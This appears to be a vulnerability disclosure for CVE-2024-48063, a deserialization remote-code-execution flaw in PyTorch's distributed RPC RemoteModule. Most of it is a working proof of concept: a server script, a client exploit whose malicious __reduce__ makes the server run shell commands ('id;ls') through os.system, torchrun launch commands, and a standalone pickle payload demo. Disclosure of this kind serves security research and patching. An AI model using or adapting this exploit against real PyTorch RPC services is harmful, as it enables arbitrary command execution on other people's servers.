Distributed RPC Framework RemoteModule has Deserialization RCE in pytorch/pytorch (CVE-2024-48063)
Description
Credit: HRP, Aftersnow, gxh
The Distributed RPC Framework's RemoteModule in pytorch/pytorch is vulnerable to deserialization remote code execution (RCE).
Proof of Concept
Initialize the environment
export MASTER_ADDR=127.0.0.1
export MASTER_PORT=5000
export TP_SOCKET_IFNAME=ens18
export GLOO_SOCKET_IFNAME=ens18
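If you prefer not to export these variables in the shell, the same setup can be done from Python before rpc.init_rpc is called. This is just an equivalent sketch; the interface name ens18 comes from the original environment and should match an interface on your own machine:

import os

# Rendezvous endpoint shared by both RPC workers
os.environ["MASTER_ADDR"] = "127.0.0.1"
os.environ["MASTER_PORT"] = "5000"

# Network interface used by the TensorPipe and Gloo backends
# (ens18 is from the original setup; replace with your own interface)
os.environ["TP_SOCKET_IFNAME"] = "ens18"
os.environ["GLOO_SOCKET_IFNAME"] = "ens18"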
The server code
ser.py
import torch
import torch.distributed.rpc as rpc

def run_server():
    # Initialize server-side RPC
    rpc.init_rpc("server", rank=0, world_size=2)
    # Wait for the client's remote call
    rpc.shutdown()

if __name__ == "__main__":
    run_server()
Run it with:
torchrun --nproc_per_node=1 --nnodes=2 --node_rank=0 --master_addr=127.0.0.1 --master_port=5000 ser.py
PoC
The client code, which also serves as the exploit
cli.py
import torch
import torch.distributed.rpc as rpc
from torch.distributed.nn.api.remote_module import RemoteModule
import torch.nn as nn

# Define a simple neural network model MyModel
class MyModel(nn.Module):
    def __init__(self):
        super(MyModel, self).__init__()
        # A simple linear layer with input dimension 2 and output dimension 2
        self.fc = nn.Linear(2, 2)

    # Malicious __reduce__: when this object is deserialized on the server,
    # pickle invokes the returned callable with the given arguments
    def __reduce__(self):
        return (__import__('os').system, ("id;ls",))

def run_client():
    # Initialize client-side RPC
    rpc.init_rpc("client", rank=1, world_size=2)

    # Create a remote module to run the model on the server side
    remote_model = RemoteModule(
        "server",    # Server-side device
        MyModel(),   # Definition of the remote module's model
        args=()      # Model initialization parameters
    )

    # Remotely call the model with an input tensor
    input_tensor = torch.tensor([1.0, 2.0])
    output = remote_model(input_tensor)
    print("Output from remote model:", output)

    # Shutdown RPC
    rpc.shutdown()

if __name__ == "__main__":
    run_client()
Run it with:
torchrun --nproc_per_node=1 --nnodes=2 --node_rank=1 --master_addr=127.0.0.1 --master_port=5000 cli.py
Now we can see the command output on the server side, because the malicious module instance is deserialized there.
Impact
Remote execution of arbitrary commands through deserialization.
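The underlying primitive is ordinary Python pickle behavior: when the client-supplied module object is sent over RPC and reconstructed on the server, an attacker-controlled __reduce__ decides what gets called during deserialization. The following standalone sketch (no RPC involved, with a hypothetical Payload class) shows the same primitive in isolation:

import os
import pickle

class Payload:
    # __reduce__ tells pickle how to rebuild this object:
    # it returns a callable and its arguments, which pickle
    # invokes during deserialization.
    def __reduce__(self):
        return (os.system, ("id",))

blob = pickle.dumps(Payload())  # what the client side serializes
pickle.loads(blob)              # what the server side does -> runs `id`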